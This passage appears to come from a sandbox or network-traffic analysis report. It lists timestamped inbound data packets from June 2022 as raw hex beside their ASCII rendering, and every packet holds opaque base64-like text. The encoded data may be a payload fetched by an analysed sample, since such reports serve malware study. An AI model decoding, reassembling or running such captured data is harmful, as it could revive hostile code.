kt7M9crHzyixivi8OHiDEL9zzwGl7ITudUha/GG2XtEr3zX6AZ7eI/XKx88ovYoHvDh4gxC/fM8ZpeyHhnVIWvx5sl7RO9g3+gGa3gb1ysfPKLmKIrw4eIMQv33PEaVopkZ1SNMwjPkc3+d+0foZ7r8T/r99+KJ5Ymo0OfMI6YQ1QFRBbUbNOPCyt3RzUaErz2/8GVJkyw+Y0FaVhp2sccVzzhinnKJ3Qm3NC5Gg1J42ctoqittzZU9av
2022-06-16 18:22:59 UTC	537	IN	Data Raw: 6d 43 37 79 66 5a 73 42 76 79 65 4b 66 2f 38 39 70 45 69 46 4d 61 59 36 68 79 69 6c 43 72 4d 4e 76 67 33 79 4e 37 51 56 71 48 61 44 42 49 6f 66 0d 0a 30 53 4b 45 63 64 41 57 6f 7a 79 4c 4b 2f 4a 38 6b 6a 47 54 42 70 38 55 6b 67 53 42 4b 6f 41 77 70 56 76 55 46 47 5a 59 64 2b 33 54 5a 48 37 4a 30 6a 5a 47 51 72 38 31 5a 48 46 77 63 75 6e 39 0d 0a 4f 50 46 49 64 56 64 39 56 4a 4a 45 63 31 4a 50 5a 55 6c 56 49 76 51 55 58 6e 51 72 77 34 35 6a 78 77 2f 47 78 59 41 31 73 77 47 52 2b 72 4a 71 76 57 79 49 7a 42 43 33 39 7a 6d 67 51 52 6f 46 0d 0a 4e 48 50 4c 4a 34 55 71 41 57 6f 4e 62 6c 6c 6b 2b 67 47 75 5a 38 30 58 78 47 71 73 34 70 42 68 61 72 2f 4a 77 45 52 56 51 33 51 76 6e 45 48 67 4f 6b 75 6c 49 6c 6f 66 4e 66 6b 45 6b 7a 79 34 0d 0a 49 49 45 63 73 6c 36 Data Ascii: mC7yfZsBvyeKf/89pEiFMaY6hyilCrMNvg3yN7QVqHaDBIof0SKEcdAWozyLK/J8kjGTBp8UkgSBKoAwpVvUFGZYd+3TZH7J0jZGQr81ZHFwcun9OPFIdVd9VJJEc1JPZUlVIvQUXnQrw45jxw/GxYA1swGR+rJqvWyIzBC39zmgQRoFNHPLJ4UqAWoNbllk+gGuZ80XxGqs4pBhar/JwERVQ3QvnEHgOkulIlofNfkEkzy4IIEcsl6
2022-06-16 18:22:59 UTC	553	IN	Data Raw: 37 57 61 43 49 4b 4d 4e 72 48 48 69 61 6f 4d 51 6e 77 4b 43 45 5a 77 62 67 41 4f 72 50 70 77 77 0d 0a 36 31 36 58 49 6f 37 79 6f 7a 53 74 52 50 41 44 6f 46 48 2b 41 59 59 72 70 43 2f 51 46 62 34 41 73 44 65 79 41 62 49 79 71 77 4f 68 47 49 34 66 6e 66 61 30 46 49 35 78 39 53 43 62 4f 4a 78 7a 0d 0a 72 52 4c 79 66 61 67 41 76 79 65 48 55 50 38 39 71 7a 43 46 4d 61 74 56 34 41 6c 63 54 32 58 4c 75 6e 51 37 39 39 6c 6e 62 6a 50 75 66 43 68 41 50 31 62 42 2f 54 6e 4e 61 42 31 34 59 79 54 2f 0d 0a 66 53 56 50 53 6d 52 46 57 78 61 74 49 45 6c 6d 44 61 71 65 4a 76 6b 45 6c 2b 33 78 5a 50 6f 4a 72 72 57 57 51 72 31 74 74 4f 77 38 6c 75 6c 4a 7a 58 67 79 46 6a 46 79 78 79 6d 78 58 54 56 39 0d 0a 48 30 67 77 64 4c 38 2f 70 54 62 6c 5a 70 55 6a 70 49 57 4d 52 55 4b Data Ascii: 7WaCIKMNrHHiaoMQnwKCEZwbgAOrPpww616XIo7yozStRPADoFH+AYYrpC/QFb4AsDeyAbIyqwOhGI4fnfa0FI5x9SCbOJxzrRLyfagAvyeHUP89qzCFMatV4AlcT2XLunQ799lnbjPufChAP1bB/TnNaB14YyT/fSVPSmRFWxatIElmDaqeJvkEl+3xZPoJrrWWQr1ttOw8lulJzXgyFjFyxymxXTV9H0gwdL8/pTblZpUjpIWMRUK
2022-06-16 18:22:59 UTC	569	IN	Data Raw: 7a 4a 6c 6e 61 33 72 66 6e 42 41 56 37 30 52 6b 0d 0a 72 4c 48 4e 62 6b 62 46 73 55 7a 69 69 53 70 37 51 54 67 77 75 49 41 73 6a 35 62 36 69 6f 37 34 39 49 69 70 74 61 36 6d 2b 50 55 74 7a 72 6e 41 6d 46 41 43 46 75 51 4c 76 72 49 4e 72 6e 59 30 0d 0a 63 6c 47 68 4b 38 38 44 74 77 6d 6e 54 59 41 48 79 69 2f 6c 38 57 4e 72 65 72 66 5a 65 55 72 51 79 33 52 45 56 4d 70 67 30 6c 78 38 57 4e 6d 38 4e 66 74 63 38 33 51 36 64 62 64 4a 79 53 78 50 0d 0a 55 6a 55 33 45 36 55 66 62 58 6c 78 31 5a 4e 58 33 68 61 59 78 35 5a 41 35 67 4f 32 39 70 68 61 2f 47 47 65 32 43 4b 65 73 42 69 42 54 43 31 31 4e 45 53 33 52 61 68 6d 43 6c 6b 41 4e 46 4e 35 0d 0a 7a 68 69 7a 4a 63 38 42 72 54 2b 75 4a 66 6c 4c 57 76 37 45 79 6c 42 6e 62 6a 4d 4f 75 55 7a 58 53 6b 75 2b 58 6a 67 Data Ascii: zJlna3rfnBAV70RkrLHNbkbFsUziiSp7QTgwuIAsj5b6io749Iipta6m+PUtzrnAmFACFuQLvrINrnY0clGhK88DtwmnTYAHyi/l8WNrerfZeUrQy3REVMpg0lx8WNm8Nftc83Q6dbdJySxPUjU3E6UfbXlx1ZNX3haYx5ZA5gO29pha/GGe2CKesBiBTC11NES3RahmClkANFN5zhizJc8BrT+uJflLWv7EylBnbjMOuUzXSku+Xjg
2022-06-16 18:22:59 UTC	585	IN	Data Raw: 0d 0a 65 6d 4c 70 38 44 48 7a 41 4b 58 49 4f 62 41 77 79 47 42 47 52 6e 56 49 30 5a 42 70 73 46 56 6e 6f 76 2b 70 76 59 43 57 2b 6f 6f 58 76 39 51 56 37 44 53 65 34 58 6e 46 6b 4a 51 4d 76 49 76 50 0d 0a 45 55 6e 75 70 6b 63 42 52 6a 42 56 76 7a 2b 74 4e 6f 59 30 50 6e 4a 4d 32 66 4a 4f 79 58 48 45 7a 34 41 6b 6f 47 34 30 39 62 51 51 33 71 38 65 75 7a 7a 73 37 45 46 57 45 65 6c 61 64 54 52 79 0d 0a 41 51 50 6e 46 6d 56 78 54 46 71 33 71 6a 49 34 4f 45 53 69 50 4a 35 71 4e 44 6c 34 67 68 43 6a 64 45 52 55 51 61 6f 44 6d 6e 56 49 57 6e 58 7a 4e 39 6c 6e 62 6a 4e 6c 74 67 6d 32 4e 6b 5a 43 0d 0a 4e 50 38 42 6a 58 6c 69 61 6a 54 2b 50 61 46 56 51 33 52 45 6b 77 54 70 52 6b 5a 31 53 4e 63 77 50 50 73 55 76 2b 56 2b 76 66 67 42 6b 72 30 54 6d 72 64 43 55 48 55 Data Ascii: emLp8DHzAKXIObAwyGBGRnVI0ZBpsFVnov+pvYCW+ooXv9QV7DSe4XnFkJQMvIvPEUnupkcBRjBVvz+tNoY0PnJM2fJOyXHEz4AkoG409bQQ3q8euzzs7EFWEeladTRyAQPnFmVxTFq3qjI4OESiPJ5qNDl4ghCjdERUQaoDmnVIWnXzN9lnbjNltgm2NkZCNP8BjXliajT+PaFVQ3REkwTpRkZ1SNcwPPsUv+V+vfgBkr0TmrdCUHU
2022-06-16 18:22:59 UTC	601	IN	Data Raw: 51 2b 6b 4d 76 47 65 45 72 51 35 33 64 45 56 48 4b 6b 7a 73 75 4b 74 61 57 4b 38 76 65 4e 6d 35 48 4d 4d 6b 4b 65 30 71 4f 62 76 73 76 48 2f 47 46 35 0d 0a 59 6d 70 53 73 50 32 62 71 62 79 4c 2f 57 74 42 62 55 59 67 2f 4d 57 36 69 63 75 4e 36 31 78 75 4d 32 55 58 78 63 2f 55 75 72 33 4c 67 47 52 6c 65 57 49 4d 76 62 79 63 75 61 71 38 7a 58 4a 55 0d 0a 51 57 30 67 7a 2f 69 75 70 6f 72 4c 79 48 5a 6e 62 6a 4d 44 2b 4e 6d 79 79 72 6d 39 6a 41 5a 45 5a 58 6b 45 34 37 48 54 68 4c 71 71 2b 67 31 45 56 45 45 4c 7a 38 75 5a 74 4b 57 4b 6a 6b 46 52 0d 0a 5a 32 35 56 37 4f 53 69 70 73 6d 35 2b 67 38 34 52 47 55 66 36 2b 2f 45 78 59 65 36 37 48 68 30 52 46 51 6e 35 4d 75 30 69 62 65 6c 52 75 59 55 32 50 4b 61 7a 35 71 4f 39 56 77 32 52 6b 4b 35 0d 0a 6a 5a 69 5a 68 Data Ascii: Q+kMvGeErQ53dEVHKkzsuKtaWK8veNm5HMMkKe0qObvsvH/GF5YmpSsP2bqbyL/WtBbUYg/MW6icuN61xuM2UXxc/Uur3LgGRleWIMvbycuaq8zXJUQW0gz/iuporLyHZnbjMD+Nmyyrm9jAZEZXkE47HThLqq+g1EVEELz8uZtKWKjkFRZ25V7OSipsm5+g84RGUf6+/ExYe67Hh0RFQn5Mu0ibelRuYU2PKaz5qO9Vw2RkK5jZiZh
2022-06-16 18:22:59 UTC	617	IN	Data Raw: 2f 73 78 34 65 36 42 61 75 62 67 71 71 2b 34 4d 75 47 68 72 65 6c 4a 50 49 33 72 57 43 47 62 45 35 7a 0d 0a 54 4e 4f 7a 32 72 58 4c 78 38 6e 6f 75 5a 47 56 79 39 48 32 73 61 75 38 6e 58 56 56 51 57 30 73 52 2f 61 6b 51 76 37 67 2b 2f 54 2f 6d 63 79 61 49 2b 32 36 4a 55 39 53 5a 4c 55 4a 67 5a 45 76 0d 0a 33 38 6e 47 38 34 32 39 68 63 4b 35 71 38 6a 6f 30 72 47 4b 74 35 77 77 79 4f 44 53 69 33 61 34 71 66 6a 70 79 73 47 35 76 62 6d 74 47 4a 71 47 6e 54 6a 63 76 4c 36 37 71 73 72 78 79 4b 4f 2b 0d 0a 6b 6f 41 44 69 64 76 5a 6d 53 54 35 6c 65 37 4c 75 35 4b 4f 73 39 4f 7a 57 72 7a 4c 78 38 65 4a 59 65 6d 6d 76 5a 7a 38 73 71 71 38 2b 64 45 51 76 70 4b 35 46 4a 30 62 6e 49 76 4c 2b 39 54 6e 0d 0a 6d 63 79 61 74 77 6d 6d 6f 73 57 75 4c 4c 4f 49 37 4e 77 65 6e Data Ascii: /sx4e6Baubgqq+4MuGhrelJPI3rWCGbE5zTNOz2rXLx8nouZGVy9H2sau8nXVVQW0sR/akQv7g+/T/mcyaI+26JU9SZLUJgZEv38nG8429hcK5q8jo0rGKt5wwyODSi3a4qfjpysG5vbmtGJqGnTjcvL67qsrxyKO+koADidvZmST5le7Lu5KOs9OzWrzLx8eJYemmvZz8sqq8+dEQvpK5FJ0bnIvL+9TnmcyatwmmosWuLLOI7Nwen
2022-06-16 18:22:59 UTC	633	IN	Data Raw: 48 61 69 6c 64 44 39 34 42 63 68 69 69 36 75 59 71 33 0d 0a 70 66 35 78 67 74 6f 71 5a 72 70 74 2b 68 6c 53 4e 52 4e 4f 76 33 32 59 37 47 6e 70 4a 7a 77 36 4e 56 58 65 46 71 7a 4e 58 73 6f 67 73 69 4c 38 52 56 70 31 4e 48 4c 61 67 6a 50 78 61 58 47 41 0d 0a 6c 76 71 4b 6a 76 6a 30 69 4b 6d 31 72 71 62 34 39 62 53 4a 6d 52 62 2f 71 44 36 2b 42 55 59 31 63 6c 67 2b 31 44 52 79 55 57 63 2b 56 2b 78 55 54 46 6f 32 52 73 48 59 42 4d 30 6f 6b 65 6b 76 0d 0a 33 4c 41 39 71 64 34 4f 6d 4d 30 5a 73 65 59 54 71 76 61 4b 58 76 78 68 72 74 6f 69 67 72 43 6c 65 63 55 66 37 73 30 50 78 4c 74 39 5a 58 62 6d 36 54 51 35 65 4d 34 41 6e 2f 39 47 33 51 53 70 0d 0a 7a 51 75 46 77 30 76 38 59 62 4c 61 49 6f 61 36 49 4b 58 48 46 2b 4c 50 44 34 69 7a 45 59 33 77 4e 37 71 2f 66 Data Ascii: HaildD94Bchii6uYq3pf5xgtoqZrpt+hlSNRNOv32Y7GnpJzw6NVXeFqzNXsogsiL8RVp1NHLagjPxaXGAlvqKjvj0iKm1rqb49bSJmRb/qD6+BUY1clg+1DRyUWc+V+xUTFo2RsHYBM0okekv3LA9qd4OmM0ZseYTqvaKXvxhrtoigrClecUf7s0PxLt9ZXbm6TQ5eM4An/9G3QSpzQuFw0v8YbLaIoa6IKXHF+LPD4izEY3wN7q/f
2022-06-16 18:22:59 UTC	649	IN	Data Raw: 34 59 0d 0a 73 2f 30 4a 6b 4d 72 34 58 72 6d 4b 74 39 4d 67 39 50 6b 55 64 2b 56 2b 63 66 6a 4a 43 73 6d 35 76 62 32 31 45 4a 71 47 6e 59 45 6d 73 69 32 42 31 71 6c 31 7a 51 47 46 35 67 4f 47 39 6f 68 62 0d 0a 2f 48 47 79 30 68 71 71 4d 78 4e 52 77 64 64 6d 75 62 33 4c 73 63 6c 78 68 70 32 56 76 32 79 34 53 75 4e 42 4a 4d 2f 5a 56 5a 4b 35 75 5a 30 68 2b 59 76 4c 6d 5a 6e 73 34 32 4f 61 6a 72 50 52 0d 0a 6f 78 4b 39 79 38 66 4e 36 4e 47 63 6c 63 75 77 37 65 6d 72 76 49 76 50 30 65 6d 54 75 62 6e 2b 78 66 61 4c 79 34 33 59 49 6e 36 36 4b 47 57 6c 32 6a 52 47 51 72 56 46 2b 47 56 34 59 6d 6f 37 0d 0a 76 41 42 45 56 55 50 35 30 53 53 2f 6b 72 6e 50 49 50 44 52 4d 49 7a 37 31 42 65 52 7a 4a 72 36 41 65 4b 31 50 31 59 6b 53 6b 69 69 2f 42 61 56 79 38 5a 35 52 Data Ascii: 4Ys/0JkMr4XrmKt9Mg9PkUd+V+cfjJCsm5vb21EJqGnYEmsi2B1ql1zQGF5gOG9ohb/HGy0hqqMxNRwddmub3Lsclxhp2Vv2y4SuNBJM/ZVZK5uZ0h+YvLmZns42OajrPRoxK9y8fN6NGclcuw7emrvIvP0emTubn+xfaLy43YIn66KGWl2jRGQrVF+GV4Ymo7vABEVUP50SS/krnPIPDRMIz71BeRzJr6AeK1P1YkSkii/BaVy8Z5R
2022-06-16 18:22:59 UTC	665	IN	Data Raw: 67 63 34 67 52 56 62 49 2b 4b 36 34 69 72 64 70 74 62 2f 2f 75 5a 6d 52 7a 41 50 34 54 64 46 6a 6b 73 48 32 4f 73 33 77 6e 5a 79 56 79 37 4c 39 6f 61 75 38 0d 0a 69 38 33 52 6d 5a 4f 35 75 66 6a 46 75 6f 76 4c 6a 64 6a 71 79 73 32 61 6a 73 48 50 36 72 69 39 79 37 48 52 78 59 65 64 6c 62 6d 38 6f 4c 75 71 76 50 33 42 79 4c 2b 53 75 53 4c 2b 52 57 70 31 0d 0a 4e 48 4c 59 36 72 72 4e 6d 6f 37 48 7a 2b 4b 34 76 63 75 7a 42 6d 6e 77 35 37 72 4b 78 6f 66 4f 32 4a 4f 4b 75 36 76 4b 50 45 72 50 34 49 53 6b 69 73 76 35 31 4b 75 51 7a 4a 72 34 79 53 37 4a 0d 0a 75 62 32 2f 74 54 43 61 68 70 33 68 5a 53 48 78 45 4a 58 49 4d 59 54 64 42 50 48 4e 43 37 58 44 44 37 55 33 49 32 33 75 2b 2f 75 62 6a 72 50 69 50 6b 5a 43 4e 46 4f 4d 5a 66 4c 33 6f 73 72 47 0d 0a 68 38 34 Data Ascii: gc4gRVbI+K64irdptb//uZmRzAP4TdFjksH2Os3wnZyVy7L9oau8i83RmZO5ufjFuovLjdjqys2ajsHP6ri9y7HRxYedlbm8oLuqvP3ByL+SuSL+RWp1NHLY6rrNmo7Hz+K4vcuzBmnw57rKxofO2JOKu6vKPErP4ISkisv51KuQzJr4yS7Jub2/tTCahp3hZSHxEJXIMYTdBPHNC7XDD7U3I23u+/ubjrPiPkZCNFOMZfL3osrGh84
2022-06-16 18:22:59 UTC	681	IN	Data Raw: 64 45 52 55 2b 59 56 6b 52 6e 57 67 78 44 30 32 63 70 59 69 6b 6a 4e 6c 63 55 7a 58 63 30 37 4c 73 62 53 35 0d 0a 6d 6f 62 70 35 37 6a 45 68 37 72 63 7a 72 79 34 71 37 37 6d 30 38 71 49 74 36 58 32 54 6d 5a 42 46 57 4c 30 34 4e 6d 77 70 63 6c 48 51 6a 51 34 72 32 2b 2b 35 38 4c 49 78 6f 64 46 56 55 4e 30 0d 0a 7a 74 48 70 6b 62 6d 35 2f 51 32 36 65 6f 49 2f 73 65 4b 6e 52 33 2f 36 32 64 62 4c 75 62 32 2f 4f 73 33 67 6c 5a 53 56 79 37 4c 31 71 61 4f 38 69 38 33 5a 69 5a 47 35 75 66 37 64 6b 6f 6e 4c 0d 0a 6a 64 6a 79 68 73 57 61 6a 73 66 66 33 72 43 39 79 37 48 42 32 59 47 64 6c 66 4f 38 4b 4c 4f 71 76 44 42 45 56 45 45 48 42 69 78 31 78 64 63 68 77 6f 32 75 4e 6f 59 51 47 58 4e 4d 32 66 4a 4b 0d 0a 68 62 48 63 73 70 71 47 63 6d 34 30 4f 66 58 51 61 62 4b Data Ascii: dERU+YVkRnWgxD02cpYikjNlcUzXc07LsbS5mobp57jEh7rczry4q77m08qIt6X2TmZBFWL04NmwpclHQjQ4r2++58LIxodFVUN0ztHpkbm5/Q26eoI/seKnR3/62dbLub2/Os3glZSVy7L1qaO8i83ZiZG5uf7dkonLjdjyhsWajsff3rC9y7HB2YGdlfO8KLOqvDBEVEEHBix1xdchwo2uNoYQGXNM2fJKhbHcspqGcm40OfXQabK
2022-06-16 18:22:59 UTC	697	IN	Data Raw: 77 58 47 54 75 62 6e 2b 7a 58 61 4c 79 34 31 53 4a 55 36 34 0d 0a 36 46 32 79 70 63 6e 4e 31 31 54 48 75 35 70 36 62 76 71 39 74 44 79 39 71 72 7a 2f 77 52 43 35 6b 72 6e 50 38 4f 79 6e 69 73 75 31 31 4d 65 54 7a 4a 71 30 30 55 61 33 7a 63 2b 51 78 62 75 61 0d 0a 38 33 50 69 59 64 76 7a 77 50 47 2b 69 37 76 58 67 57 7a 50 77 39 47 31 70 59 6f 37 7a 42 79 46 36 2f 6f 51 66 38 66 50 6c 72 75 39 79 37 48 52 4a 59 47 64 6c 64 38 67 64 2f 73 51 6f 55 66 42 0d 0a 39 4c 79 53 75 66 2f 6d 53 56 70 30 77 35 50 59 34 73 37 4f 6d 6f 36 6e 37 62 66 37 41 73 7a 48 75 32 78 7a 48 69 42 42 5a 50 50 51 5a 62 32 4c 75 39 2f 45 51 62 69 35 69 6b 73 59 61 62 33 33 0d 0a 61 5a 2b 52 7a 4f 37 38 66 4b 54 4a 75 63 6d 68 46 4c 71 61 68 6d 45 37 45 4c 44 74 65 61 32 38 69 38 2f Data Ascii: wXGTubn+zXaLy41SJU646F2ypcnN11THu5p6bvq9tDy9qrz/wRC5krnP8Oynisu11MeTzJq00Ua3zc+Qxbua83PiYdvzwPG+i7vXgWzPw9G1pYo7zByF6/oQf8fPlru9y7HRJYGdld8gd/sQoUfB9LySuf/mSVp0w5PY4s7Omo6n7bf7AszHu2xzHiBBZPPQZb2Lu9/EQbi5iksYab33aZ+RzO78fKTJucmhFLqahmE7ELDtea28i8/
2022-06-16 18:22:59 UTC	713	IN	Data Raw: 6b 6b 55 45 0d 0a 55 63 48 66 61 63 6d 4e 72 75 77 6a 69 2b 37 6b 55 4b 66 4a 75 55 32 44 50 41 37 75 39 46 71 56 79 38 62 7a 30 45 32 2b 69 37 74 58 54 65 2f 50 79 32 47 31 70 59 71 2f 39 30 57 61 6b 63 7a 73 0d 0a 39 4f 53 6b 79 62 6d 70 63 64 47 79 6d 34 61 64 34 62 6b 35 68 37 71 71 79 76 6c 55 71 62 36 53 7a 64 4e 6c 74 61 57 4b 76 33 44 59 34 6d 4c 4f 6d 6f 37 48 31 7a 71 37 76 63 75 78 79 57 57 47 0d 0a 6e 5a 58 79 66 4b 56 45 57 76 55 68 6d 64 47 54 59 73 4e 63 69 37 65 6c 73 72 48 61 72 35 69 52 4d 32 56 78 54 4e 47 7a 54 72 2f 4c 78 38 39 74 4b 4f 6e 2f 4d 4d 53 48 75 74 35 42 4a 4c 76 42 0d 0a 36 5a 4f 35 75 66 61 6b 51 76 37 34 2b 2f 53 4c 6c 63 79 61 2f 4e 6b 69 34 4c 6d 39 5a 74 44 42 31 49 53 64 34 37 48 52 67 37 71 71 68 54 47 34 56 63 4b Data Ascii: kkUEUcHfacmNruwji+7kUKfJuU2DPA7u9FqVy8bz0E2+i7tXTe/Py2G1pYq/90Wakczs9OSkybmpcdGym4ad4bk5h7qqyvlUqb6SzdNltaWKv3DY4mLOmo7H1zq7vcuxyWWGnZXyfKVEWvUhmdGTYsNci7elsrHar5iRM2VxTNGzTr/Lx89tKOn/MMSHut5BJLvB6ZO5ufakQv74+/SLlcya/Nki4Lm9ZtDB1ISd47HRg7qqhTG4VcK
2022-06-16 18:22:59 UTC	729	IN	Data Raw: 46 45 67 66 41 6f 6f 49 72 4c 41 6f 4e 67 66 72 34 77 65 52 37 52 75 32 36 38 79 38 65 73 2b 35 4b 63 6c 66 4a 38 68 45 53 54 42 6f 68 45 76 4e 44 53 75 62 6e 38 0d 0a 7a 51 4b 4a 79 34 33 53 32 6a 62 50 6d 6f 35 4d 4c 79 32 41 42 2b 45 34 67 79 43 46 6e 5a 58 4c 78 76 55 49 58 61 73 37 62 71 75 2b 35 77 4f 54 6e 4d 46 56 64 54 52 42 6b 65 38 72 35 2b 67 38 0d 0a 6d 4c 49 4d 56 37 7a 4c 73 63 46 42 68 35 32 56 76 37 52 63 75 36 71 38 6e 4a 30 2b 76 70 4c 4e 79 31 47 32 70 59 71 39 2f 77 57 62 6b 63 7a 6f 35 42 69 6d 79 62 6e 4c 6f 52 69 34 6d 6f 62 76 0d 0a 37 79 44 41 68 37 72 63 78 6d 69 34 71 37 34 4a 7a 55 74 46 53 46 70 31 76 66 38 42 6d 35 48 4d 37 75 51 63 70 73 6d 35 79 58 59 30 7a 65 41 31 6e 70 58 4c 73 76 55 4a 71 62 79 4c 7a 77 56 4e 0d 0a 35 Data Ascii: FEgfAooIrLAoNgfr4weR7Ru268y8es+5KclfJ8hESTBohEvNDSubn8zQKJy43S2jbPmo5MLy2AB+E4gyCFnZXLxvUIXas7bqu+5wOTnMFVdTRBke8r5+g8mLIMV7zLscFBh52Vv7Rcu6q8nJ0+vpLNy1G2pYq9/wWbkczo5BimybnLoRi4mobv7yDAh7rcxmi4q74JzUtFSFp1vf8Bm5HM7uQcpsm5yXY0zeA1npXLsvUJqbyLzwVN5
2022-06-16 18:22:59 UTC	745	IN	Data Raw: 31 6a 6a 68 2b 79 4e 62 55 55 6d 35 48 4d 6d 6f 37 42 46 7a 36 75 75 73 2f 47 75 2b 38 38 70 65 46 35 7a 52 7a 4d 0d 0a 57 45 4e 30 52 46 54 4b 69 42 75 45 62 55 69 57 75 66 69 2b 6e 54 4c 6c 33 77 2b 4f 4a 44 4b 34 51 56 4a 51 6d 55 52 6c 65 57 49 36 55 4c 42 64 52 56 56 44 64 50 78 63 55 47 31 47 72 6c 76 47 0d 0a 57 33 58 7a 4e 36 31 6e 62 6a 4e 6c 47 77 67 77 4e 73 76 48 45 4d 4f 37 6d 69 6d 4b 33 54 44 47 68 34 4c 51 35 34 2b 37 71 31 46 70 52 6b 62 34 78 55 36 43 79 34 33 59 36 73 37 49 6d 6f 35 2f 0d 0a 69 4c 34 54 71 4c 6c 31 72 6f 31 74 33 5a 66 4c 73 50 30 31 71 37 79 4c 7a 39 6b 78 6b 37 6d 35 6e 53 74 6d 69 73 76 35 31 42 65 51 7a 4a 72 34 79 63 62 4e 75 62 32 35 74 65 43 65 68 70 33 6a 0d 0a 75 51 47 47 75 71 72 4f 34 65 53 76 76 70 4c 50 30 Data Ascii: 1jjh+yNbUUm5HMmo7BFz6uus/Gu+88peF5zRzMWEN0RFTKiBuEbUiWufi+nTLl3w+OJDK4QVJQmURleWI6ULBdRVVDdPxcUG1GrlvGW3XzN61nbjNlGwgwNsvHEMO7mimK3TDGh4LQ54+7q1FpRkb4xU6Cy43Y6s7Imo5/iL4TqLl1ro1t3ZfLsP01q7yLz9kxk7m5nStmisv51BeQzJr4ycbNub25teCehp3juQGGuqrO4eSvvpLP0
2022-06-16 18:22:59 UTC	761	IN	Data Raw: 44 65 6f 54 4e 69 32 76 4a 47 7a 4a 71 4f 78 31 69 39 79 32 72 4c 0d 0a 78 37 76 75 4b 57 61 56 35 74 43 65 52 56 56 44 2f 77 46 63 79 69 56 4b 46 2f 34 59 55 69 65 2f 50 36 32 50 6a 37 4b 5a 6a 71 57 55 4e 6b 5a 43 76 33 31 4d 37 6a 46 75 4f 37 39 70 63 42 66 65 0d 0a 44 6f 69 73 4c 63 65 52 75 61 2f 44 53 46 70 31 76 7a 64 5a 35 49 49 37 6c 33 35 63 47 6a 36 30 54 53 55 38 59 4f 34 30 6e 6f 4b 34 4e 48 68 46 76 4e 70 30 52 46 54 4b 34 4b 36 39 69 72 66 54 0d 0a 2b 42 43 4e 72 70 6a 6c 5a 70 6e 36 54 74 4f 7a 78 72 37 4c 78 38 2f 6f 2b 5a 36 56 79 37 44 31 59 61 71 38 69 79 35 66 4b 64 6d 6c 51 57 58 44 7a 31 48 4c 6a 61 37 73 62 4c 6a 6f 56 62 4f 6c 0d 0a 79 63 30 53 4d 4d 65 57 6a 69 50 70 37 39 44 43 68 37 72 63 78 6c 53 37 71 37 37 6d 43 37 72 2b 57 Data Ascii: DeoTNi2vJGzJqOx1i9y2rLx7vuKWaV5tCeRVVD/wFcyiVKF/4YUie/P62Pj7KZjqWUNkZCv31M7jFuO79pcBfeDoisLceRua/DSFp1vzdZ5II7l35cGj60TSU8YO40noK4NHhFvNp0RFTK4K69irfT+BCNrpjlZpn6TtOzxr7Lx8/o+Z6Vy7D1Yaq8iy5fKdmlQWXDz1HLja7sbLjoVbOlyc0SMMeWjiPp79DCh7rcxlS7q77mC7r+W
2022-06-16 18:22:59 UTC	777	IN	Data Raw: 42 77 2b 52 53 4c 0d 0a 35 54 76 75 4a 4b 42 5a 5a 30 4c 4c 59 64 7a 50 49 4a 33 70 49 6a 69 77 4e 5a 6e 65 46 70 44 48 4c 6e 6c 74 4d 6b 2b 79 44 62 70 31 4e 48 4a 52 6a 47 6e 30 49 4a 46 49 57 6a 5a 47 4b 44 53 7a 0d 0a 41 62 6e 36 71 6d 34 2f 66 4a 67 56 33 67 36 51 72 4e 75 44 6b 37 6d 42 4d 4c 53 6c 69 73 75 4e 33 43 71 36 32 2f 56 64 73 61 57 39 41 36 36 2f 64 62 41 42 38 47 39 71 4e 44 6c 34 7a 72 41 65 0d 0a 74 34 69 59 6a 61 47 4b 69 72 6d 45 6c 72 6e 34 76 70 32 72 6f 6d 62 75 6e 63 2b 32 50 73 55 2f 49 44 67 34 63 68 46 5a 58 7a 51 35 45 4f 32 44 52 47 51 73 32 4b 46 71 56 71 37 2f 76 31 74 31 0d 0a 74 37 5a 64 35 42 4d 72 5a 51 35 62 4d 67 70 7a 51 6a 52 51 37 4c 4e 2b 63 67 4b 51 32 58 39 56 76 53 36 44 52 56 54 43 71 55 72 4e 49 45 54 54 49 Data Ascii: Bw+RSL5TvuJKBZZ0LLYdzPIJ3pIjiwNZneFpDHLnltMk+yDbp1NHJRjGn0IJFIWjZGKDSzAbn6qm4/fJgV3g6QrNuDk7mBMLSlisuN3Cq62/VdsaW9A66/dbAB8G9qNDl4zrAet4iYjaGKirmElrn4vp2rombunc+2PsU/IDg4chFZXzQ5EO2DRGQs2KFqVq7/v1t1t7Zd5BMrZQ5bMgpzQjRQ7LN+cgKQ2X9VvS6DRVTCqUrNIETTI
2022-06-16 18:22:59 UTC	793	IN	Data Raw: 4c 58 33 76 49 70 45 41 34 44 57 7a 70 63 6e 2f 30 54 55 34 52 5a 4b 59 36 2b 39 77 78 6f 65 36 76 76 54 31 2b 5a 43 2f 6b 72 6c 31 46 77 7a 50 41 48 2f 35 42 4f 76 6c 0d 0a 64 75 31 79 44 6b 61 2f 77 2f 37 4b 78 37 76 75 4e 4f 37 68 59 62 46 37 46 48 48 4b 34 59 53 71 76 70 4c 4e 41 35 33 44 31 37 58 4b 6a 61 35 6f 32 53 63 6b 2b 67 6e 53 76 63 76 2b 79 73 65 37 0d 0a 5a 6e 33 7a 34 37 47 42 68 72 71 71 79 4f 48 38 71 72 36 53 7a 39 4e 39 74 36 57 4b 33 7a 65 34 61 5a 48 4d 6d 76 72 4a 47 73 6d 35 76 62 32 39 38 4a 75 47 6e 65 47 35 6a 59 61 36 71 73 68 6c 0d 0a 7a 63 48 78 6b 37 6d 35 2f 73 33 71 69 38 75 4e 32 4f 49 75 7a 4a 71 4f 69 68 2f 50 52 30 32 43 64 62 33 67 73 47 33 76 63 4d 65 48 75 70 4c 47 66 4c 75 72 76 6d 31 47 52 6e 58 44 7a 39 6e 4b 0d Data Ascii: LX3vIpEA4DWzpcn/0TU4RZKY6+9wxoe6vvT1+ZC/krl1FwzPAH/5BOvldu1yDka/w/7Kx7vuNO7hYbF7FHHK4YSqvpLNA53D17XKja5o2Sck+gnSvcv+yse7Zn3z47GBhrqqyOH8qr6Sz9N9t6WK3ze4aZHMmvrJGsm5vb298JuGneG5jYa6qshlzcHxk7m5/s3qi8uN2OIuzJqOih/PR02Cdb3gsG3vcMeHupLGfLurvm1GRnXDz9nK
